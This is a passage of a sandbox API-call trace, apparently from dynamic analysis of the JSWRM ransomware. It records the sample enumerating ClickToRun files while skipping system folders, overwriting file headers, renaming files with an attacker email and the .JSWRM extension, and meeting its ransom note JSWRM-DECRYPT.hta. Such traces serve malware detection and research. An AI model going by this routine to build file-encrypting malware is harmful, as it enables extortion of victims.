(HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0067.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RUI.en-us.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RUI.en-us.dll", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RUI.en-us.dll", lpUsedDefaultChar=0x0) returned 15 [0067.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0067.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0067.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RUI.en-us.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RUI.en-us.dll", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RUI.en-us.dll", lpUsedDefaultChar=0x0) returned 15 [0067.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0067.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0067.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0067.569] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b64383, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b64383, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x514a8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="concrt140.dll", cAlternateFileName="CONCRT~1.DLL")) returned 1 [0067.569] lstrcmpiW (lpString1="concrt140.dll", lpString2=".") returned 1 [0067.569] lstrcmpiW (lpString1="concrt140.dll", lpString2="..") returned 1 [0067.569] lstrcmpiW (lpString1="concrt140.dll", lpString2="...") returned 1 [0067.569] lstrcmpiW (lpString1="concrt140.dll", lpString2="windows") returned -1 [0067.569] lstrcmpiW (lpString1="concrt140.dll", lpString2="recovery") returned -1 [0067.570] lstrcmpiW (lpString1="concrt140.dll", lpString2="perflogs") returned -1 [0067.570] lstrcmpiW (lpString1="concrt140.dll", lpString2="documents and settings") returned -1 [0067.570] lstrcmpiW (lpString1="concrt140.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.570] lstrcmpiW (lpString1="concrt140.dll", lpString2="system volume information") returned -1 [0067.570] lstrcmpiW (lpString1="concrt140.dll", lpString2="msocache") returned -1 [0067.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="concrt140.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0067.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="concrt140.dll", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="concrt140.dll", lpUsedDefaultChar=0x0) returned 13 [0067.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0067.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="concrt140.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0067.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="concrt140.dll", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="concrt140.dll", lpUsedDefaultChar=0x0) returned 13 [0067.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0067.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0067.570] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b64383, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b64383, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbd783a00, ftLastWriteTime.dwHighDateTime=0x1d0d7e5, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="i640.hash", cAlternateFileName="I640~1.HAS")) returned 1 [0067.570] lstrcmpiW (lpString1="i640.hash", lpString2=".") returned 1 [0067.570] lstrcmpiW (lpString1="i640.hash", lpString2="..") returned 1 [0067.570] lstrcmpiW (lpString1="i640.hash", lpString2="...") returned 1 [0067.570] lstrcmpiW (lpString1="i640.hash", lpString2="windows") returned -1 [0067.570] lstrcmpiW (lpString1="i640.hash", lpString2="recovery") returned -1 [0067.570] lstrcmpiW (lpString1="i640.hash", lpString2="perflogs") returned -1 [0067.570] lstrcmpiW (lpString1="i640.hash", lpString2="documents and settings") returned 1 [0067.570] lstrcmpiW (lpString1="i640.hash", lpString2="$RECYCLE.BIN") returned 1 [0067.570] lstrcmpiW (lpString1="i640.hash", lpString2="system volume information") returned -1 [0067.570] lstrcmpiW (lpString1="i640.hash", lpString2="msocache") returned -1 [0067.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0067.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="i640.hash", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0067.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="i640.hash", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i640.hash", lpUsedDefaultChar=0x0) returned 9 [0067.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0067.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0067.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="i640.hash", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0067.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="i640.hash", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i640.hash", lpUsedDefaultChar=0x0) returned 9 [0067.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0067.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0067.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.571] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0067.571] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=102) returned 1 [0067.571] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0067.572] ReadFile (in: hFile=0x454, lpBuffer=0x2331c8, nNumberOfBytesToRead=0x60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2331c8*, lpNumberOfBytesRead=0x345ec04*=0x60, lpOverlapped=0x0) returned 1 [0067.572] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.573] WriteFile (in: hFile=0x454, lpBuffer=0x2331c8*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2331c8*, lpNumberOfBytesWritten=0x345ec00*=0x60, lpOverlapped=0x0) returned 1 [0067.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0067.573] CloseHandle (hObject=0x454) returned 1 [0067.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0067.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0067.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0067.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0067.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0067.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0067.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.574] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0067.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0067.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0067.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.575] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x808dbb6b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x808dbb6b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbc470d00, ftLastWriteTime.dwHighDateTime=0x1d0d7e5, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="i641033.hash", cAlternateFileName="I64103~1.HAS")) returned 1 [0067.575] lstrcmpiW (lpString1="i641033.hash", lpString2=".") returned 1 [0067.575] lstrcmpiW (lpString1="i641033.hash", lpString2="..") returned 1 [0067.575] lstrcmpiW (lpString1="i641033.hash", lpString2="...") returned 1 [0067.575] lstrcmpiW (lpString1="i641033.hash", lpString2="windows") returned -1 [0067.575] lstrcmpiW (lpString1="i641033.hash", lpString2="recovery") returned -1 [0067.575] lstrcmpiW (lpString1="i641033.hash", lpString2="perflogs") returned -1 [0067.575] lstrcmpiW (lpString1="i641033.hash", lpString2="documents and settings") returned 1 [0067.575] lstrcmpiW (lpString1="i641033.hash", lpString2="$RECYCLE.BIN") returned 1 [0067.575] lstrcmpiW (lpString1="i641033.hash", lpString2="system volume information") returned -1 [0067.575] lstrcmpiW (lpString1="i641033.hash", lpString2="msocache") returned -1 [0067.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="i641033.hash", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0067.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="i641033.hash", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i641033.hash", lpUsedDefaultChar=0x0) returned 12 [0067.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0067.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="i641033.hash", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0067.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="i641033.hash", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i641033.hash", lpUsedDefaultChar=0x0) returned 12 [0067.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0067.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0067.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0067.576] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0067.576] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=102) returned 1 [0067.576] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0067.576] ReadFile (in: hFile=0x454, lpBuffer=0x2331c8, nNumberOfBytesToRead=0x60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2331c8*, lpNumberOfBytesRead=0x345ec04*=0x60, lpOverlapped=0x0) returned 1 [0067.577] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.577] WriteFile (in: hFile=0x454, lpBuffer=0x2331c8*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2331c8*, lpNumberOfBytesWritten=0x345ec00*=0x60, lpOverlapped=0x0) returned 1 [0067.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0067.577] CloseHandle (hObject=0x454) returned 1 [0067.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0067.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0067.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0067.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0067.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0067.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0067.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.578] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0067.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0067.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0067.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0067.579] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b64383, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b64383, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbe3eab00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x10ae80, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="IntegratedOffice.exe", cAlternateFileName="INTEGR~1.EXE")) returned 1 [0067.579] lstrcmpiW (lpString1="IntegratedOffice.exe", lpString2=".") returned 1 [0067.579] lstrcmpiW (lpString1="IntegratedOffice.exe", lpString2="..") returned 1 [0067.579] lstrcmpiW (lpString1="IntegratedOffice.exe", lpString2="...") returned 1 [0067.579] lstrcmpiW (lpString1="IntegratedOffice.exe", lpString2="windows") returned -1 [0067.579] lstrcmpiW (lpString1="IntegratedOffice.exe", lpString2="recovery") returned -1 [0067.579] lstrcmpiW (lpString1="IntegratedOffice.exe", lpString2="perflogs") returned -1 [0067.579] lstrcmpiW (lpString1="IntegratedOffice.exe", lpString2="documents and settings") returned 1 [0067.579] lstrcmpiW (lpString1="IntegratedOffice.exe", lpString2="$RECYCLE.BIN") returned 1 [0067.579] lstrcmpiW (lpString1="IntegratedOffice.exe", lpString2="system volume information") returned -1 [0067.579] lstrcmpiW (lpString1="IntegratedOffice.exe", lpString2="msocache") returned -1 [0067.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IntegratedOffice.exe", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0067.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0067.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IntegratedOffice.exe", cchWideChar=20, lpMultiByteStr=0x2413a8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IntegratedOffice.exe", lpUsedDefaultChar=0x0) returned 20 [0067.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IntegratedOffice.exe", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0067.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IntegratedOffice.exe", cchWideChar=20, lpMultiByteStr=0x2410d8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IntegratedOffice.exe", lpUsedDefaultChar=0x0) returned 20 [0067.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0067.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0067.580] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ee224c5, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1ee224c5, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1ee224c5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0067.580] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0067.580] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0067.580] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0067.580] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0067.580] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0067.580] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0067.580] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0067.580] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0067.580] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0067.580] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0067.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) 